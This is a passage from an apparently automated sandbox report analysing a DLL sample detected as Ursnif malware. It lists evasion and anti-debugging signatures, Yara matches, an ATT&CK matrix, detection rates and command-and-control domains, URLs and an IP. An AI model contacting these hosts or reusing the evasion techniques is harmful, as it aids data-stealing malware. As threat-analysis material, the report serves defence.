                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Found evasive API chain (may stop execution after checking system information)Show sources
                      Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4532Thread sleep time: -1773297476s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4532Thread sleep count: 53 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4532Thread sleep count: 37 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\loaddll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes

                      Anti Debugging:

                      barindex
                      Found API chain indicative of debugger detectionShow sources
                      Source: C:\Windows\System32\loaddll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001753 LoadLibraryA,GetProcAddress,0_2_10001753
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0091099E mov eax, dword ptr fs:[00000030h]0_2_0091099E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009108B2 mov eax, dword ptr fs:[00000030h]0_2_009108B2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_009107C9 mov eax, dword ptr fs:[00000030h]0_2_009107C9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0091090D mov eax, dword ptr fs:[00000030h]0_2_0091090D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00910725 mov eax, dword ptr fs:[00000030h]0_2_00910725
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A408B2 mov eax, dword ptr fs:[00000030h]3_2_00A408B2
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A4099E mov eax, dword ptr fs:[00000030h]3_2_00A4099E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A407C9 mov eax, dword ptr fs:[00000030h]3_2_00A407C9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A40725 mov eax, dword ptr fs:[00000030h]3_2_00A40725
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_00A4090D mov eax, dword ptr fs:[00000030h]3_2_00A4090D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD08B2 mov eax, dword ptr fs:[00000030h]4_2_00BD08B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD099E mov eax, dword ptr fs:[00000030h]4_2_00BD099E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD07C9 mov eax, dword ptr fs:[00000030h]4_2_00BD07C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD0725 mov eax, dword ptr fs:[00000030h]4_2_00BD0725
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00BD090D mov eax, dword ptr fs:[00000030h]4_2_00BD090D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B708B2 mov eax, dword ptr fs:[00000030h]5_2_00B708B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B7099E mov eax, dword ptr fs:[00000030h]5_2_00B7099E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B707C9 mov eax, dword ptr fs:[00000030h]5_2_00B707C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B70725 mov eax, dword ptr fs:[00000030h]5_2_00B70725
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00B7090D mov eax, dword ptr fs:[00000030h]5_2_00B7090D

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 134.0.117.195 187Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: google.mail.com
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: firsone1.online
                      Source: C:\Windows\SysWOW64\regsvr32.exeDomain query: kdsjdsadas.online
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\9091.dll",#1Jump to behavior
                      Source: loaddll32.exe, 00000000.00000002.796932415.0000000001280000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.797914818.0000000003260000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.797442073.0000000002F90000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.797503474.0000000002D90000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.796932415.0000000001280000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.797914818.0000000003260000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.797442073.0000000002F90000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.797503474.0000000002D90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.796932415.0000000001280000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.797914818.0000000003260000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.797442073.0000000002F90000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.797503474.0000000002D90000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.796932415.0000000001280000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.797914818.0000000003260000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.797442073.0000000002F90000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.797503474.0000000002D90000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D47A2E cpuid 0_2_00D47A2E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001E13 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_10001E13
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001EE5 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_10001EE5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00D49267 wsprintfA,GetUserNameW,GetComputerNameW,GetUserNameW,GetComputerNameW,WideCharToMultiByte,0_2_00D49267

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 4908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2332, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5032, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6008, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.990000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.ba0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.a80000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.2bd0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4280000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.46d94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2b694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.4a40000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.4a994a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d40000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.47e94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2DLL Side-Loading1Process Injection112Virtualization/Sandbox Evasion11OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API12Boot or Logon Initialization ScriptsDLL Side-Loading1Process Injection112LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerVirtualization/Sandbox Evasion11SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Regsvr321NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery113Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      9091.dll23%VirustotalBrowse
                      9091.dll8%MetadefenderBrowse
                      9091.dll30%ReversingLabsWin32.Trojan.Sleltasos
                      9091.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.1.loaddll32.exe.10000000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      5.2.rundll32.exe.4280000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      3.1.regsvr32.exe.10000000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.2.regsvr32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      5.2.rundll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      4.2.rundll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      3.2.regsvr32.exe.2bd0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      4.2.rundll32.exe.4a40000.2.unpack100%AviraHEUR/AGEN.1108168Download File
                      4.1.rundll32.exe.10000000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.loaddll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                      0.2.loaddll32.exe.d40000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      5.1.rundll32.exe.10000000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      firsone1.online0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://kdsjdsadas.online/jkloll/n1yCX1bWO/IyJVfm7yH8jH38Bki7vn/f4C45hYEgppc8I7zVra/TaacUzdsuPU7_2Bk0%Avira URL Cloudsafe
                      https://firsone1.online/jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu50%Avira URL Cloudsafe
                      https://firsone1.online/jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki0%Avira URL Cloudsafe
                      https://firsone1.online/jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki0%Avira URL Cloudsafe
                      https://kdsjdsadas.online/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      firsone1.online
                      		134.0.117.195
                      		truetrueunknown
                      google.mail.com
                      		unknown
                      		unknownfalse
                        		high
